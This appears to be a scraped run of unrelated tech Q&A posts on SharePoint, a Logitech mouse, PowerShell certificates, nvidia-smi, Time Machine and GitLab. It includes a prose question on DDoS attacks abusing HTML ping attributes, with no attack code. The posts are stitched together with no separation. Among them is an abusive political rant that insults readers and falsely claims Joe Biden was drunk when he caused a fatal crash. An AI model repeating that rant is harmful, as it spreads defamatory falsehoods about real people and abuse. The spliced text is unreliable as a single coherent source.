SharePoint 2016 People picker error “Sorry, we’re having trouble reaching the server”

My users facing error on SharePoint 2016 when they try to add more than 15 users to share a file/folder. However, this error happen intermittently and have different results on different network connection. I have extended the timeout from default 25s to 60s. After that, the issue reoccurs when a user was adding names in the people picker, left the computer idle for a while and when he comes back to continue adding more names, he encounters the error message.

Does the network connectivity have anything to do with the people picker extracting names from AD? Is it normal for the people picker to timeout if left idle for some time? How can the users avoid facing this error again?

Logitech mouse G300s: the changes in Logitech Gaming SW were not reflected

Problem: changes made in Logitech Gaming SW (ie. led color, any button) were not reflected – mouse still used the original settings.

Solution (in my case): Karabinier-Elements -> Devices -> modify events from this device -> uncheck G300s Optical Gaming Mouse (Lochitech) + uncheck Manipulate LED too.

Note: I spent with this 2 hours, so I hope that this could help somebody, who is using Karabinier-Elements

(macOs Mojave 10.14, Logitech Gaming Sofware 9.02.22, Karabinier-Elements 12.2.0)

Why were hyperlink auditing pings used for DDoS attacks and not any other requests?

A few days ago this new story has been published:

Researchers have found that the HTML feature called hyperlink auditing, or pings, is being used to perform DDoS attacks against various sites. This feature is normally used by sites to track link clicks, but is now found to be abused by attackers to send a massive amount of web requests to sites in order to take them offline.
[…]
In new research by Imperva, researchers have found that HTML pings are being utilized by attackers to perform distributed denial of services attacks on various sites.

The article goes on describing the attack that basically executed some JS to add a link with ping attribute and automatically ”click every second”. It goes on in the same usual way describing that attackers are supposed to have “used social engineering and malvertising to direct users to pages hosting these scripts”.

Strangely it does not mention the victims, but just says these were “gaming companies”.


The question now is, especially considering they have used JS anyway, why did not they just use any other form of requests?

I admin, usual AJAX requests may have been problematic, as the attacked websites likely do not have CORS headers set, so they would have been blocked by the browser as they violate the same origin policy, but usually CORS does not apply to <img tags e.g.… So they could just have used that.

Why did they choose the ping attributes for that, and are they thus more dangerous than other (common) methods for DDoSing?

How do I tell the difference between a self signed ca I made for myself for signing scripts and ones that were already there?

Basically my question is, how do I know when a certificate I find in my cert:/localmachine/my store is self signed and not already present when I start using a new computer.

If you do a Get-ChildItem cert:\localmachine\my it can list many certificates, and it lists the Thumbprint and the Subject, and you can list all of the members of each by tacking on a | % { $ _ |get-member } on the end of it.

But which of these members can tell me the difference between a self-signed cert that I created (possibly by mistake) and ones that were already in there, and signed by a for real certificate authority?

(honestly, I just want to sign my personal scripts with my personal certificate, but have only one certificate)

[ Politics ] Open Question : Liberals, were you angry about the Trump tweet showing Joe Biden molesting Joe Biden from behind?

It was humor, something liberals are lacking. Don Lemon and Chris Cuomo actually said the video was “doctored” Really Chris Cuomo, there aren’t two Joe Bidens? No Shitt Sherlock! Lol, what a couple of dummies. Lol at the self proclaimed “Goddess”. Yeah, OK Comrade, fellow Russian troll. Maybe if Biden wasn’t drunk on Christmas Eve, he wouldn’t have pulled out in front of a truck and killed his wife and child. Look up Hunter. The guy was more corrupt than Paul Manafort, he was up to the same schit in Ukraine. Do the research, Bimbo. And stop being a little cheerleader for drunks like Hillary, Pelosi and Biden. All three are DRUNKS. Hunter is doing his dead brothers widow, while not doing drugs and prostitutes. The guy is a chip off the old corrupt block. Why do you thing the Dim Party is trying to get rid of Joe, CORRUPTION! You are so naive it is pathetic.

nvidia-smi: no devices were found

Ubuntu 18.04.02 LTS

Trying to get a 1080Ti recognized by nvidia-smi. Here are the details:

$   lspci -vvv     00:05.0 VGA compatible controller: NVIDIA Corporation GP102 [GeForce GTX 1080 Ti] (rev a1) (prog-if 00 [VGA controller])             Subsystem: eVga.com. Corp. GP102 [GeForce GTX 1080 Ti]             Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-             Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-             Latency: 0             Interrupt: pin A routed to IRQ 16             Region 0: Memory at c1000000 (32-bit, non-prefetchable) [size=16M]             Region 1: Memory at d000000000 (64-bit, prefetchable) [size=256M]             Region 3: Memory at c2000000 (64-bit, prefetchable) [size=32M]             Region 5: I/O ports at 2080 [size=128]             [virtual] Expansion ROM at 000c0000 [disabled] [size=128K]             Capabilities: <access denied>             Kernel driver in use: nvidia             Kernel modules: nvidiafb, nouveau, nvidia_drm, nvidia  $   dmesg | grep NVRM [    4.753635] NVRM: loading NVIDIA UNIX x86_64 Kernel Module  418.56  Fri Mar 15 12:59:26 CDT 2019 [   35.526828] NVRM: RmInitAdapter failed! (0x24:0x65:1070) [   35.527088] NVRM: rm_init_adapter failed for device bearing minor number 0 [  632.733434] NVRM: RmInitAdapter failed! (0x24:0x65:1070) [  632.733868] NVRM: rm_init_adapter failed for device bearing minor number 0   $   dmesg | grep nvidia [    4.616629] nvidia: loading out-of-tree module taints kernel. [    4.616637] nvidia: module license 'NVIDIA' taints kernel. [    4.628619] nvidia: module verification failed: signature and/or required key missing - tainting kernel [    4.649214] nvidia-nvlink: Nvlink Core is being initialized, major device number 241 [    4.649632] nvidia 0000:00:05.0: can't derive routing for PCI INT A [    4.649634] nvidia 0000:00:05.0: PCI INT A: no GSI [    4.649743] nvidia 0000:00:05.0: vgaarb: changed VGA decodes: olddecodes=io+mem,decodes=none:owns=io+mem [    4.766013] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  418.56  Fri Mar 15 12:32:40 CDT 2019 [    4.767330] [drm] [nvidia-drm] [GPU ID 0x00000005] Loading driver [    4.767331] [drm] Initialized nvidia-drm 0.0.0 20160202 for 0000:00:05.0 on minor 0 

Why were my files backed up again by Time Machine?

My 200 GB music library resides on a SD card that is permanently inserted into my MacBook Pro. The volume is encrypted using Filevault. Time Machine will include that volume when doing backups onto an external USB disk. This solutions worked very well for the past 1–2 years.

However, today Time Machine decided to backup the entire SD card again (I verified this using BackupLoupe) and it is a complete mystery to me why it did that. The md5 checksums of both versions are identical and also permissions seem identical between the two backed up versions and the original one. May main drive was backed up as usual (i.e. no full backup).

The only actual change I can think of, is an upgrade to the macOS 10.14.4 from 10.14.3.

Any ideas why these files have been backed up again and how I can investigate this?

GitLab: You cannot push commits for . You can only push commits that were committed with one of your own verified emails

I am having this weird issue where I cloned a repository with my credentials (my_correct@email.adress). But I can not push the changes because I always receive this message:

GitLab: You cannot push commits for 'my_wrong@email.adress' . You can only push commits that were committed with one of your own verified emails. 

The issue is that when I check the global and the repository users I find it is my_correct@email.adress:

Global:

git git config  --global user.email git config  --global user.name 

Repository:

git git config  user.email git config   user.name 

What should I do and what is the reason behind this mysterious mystery?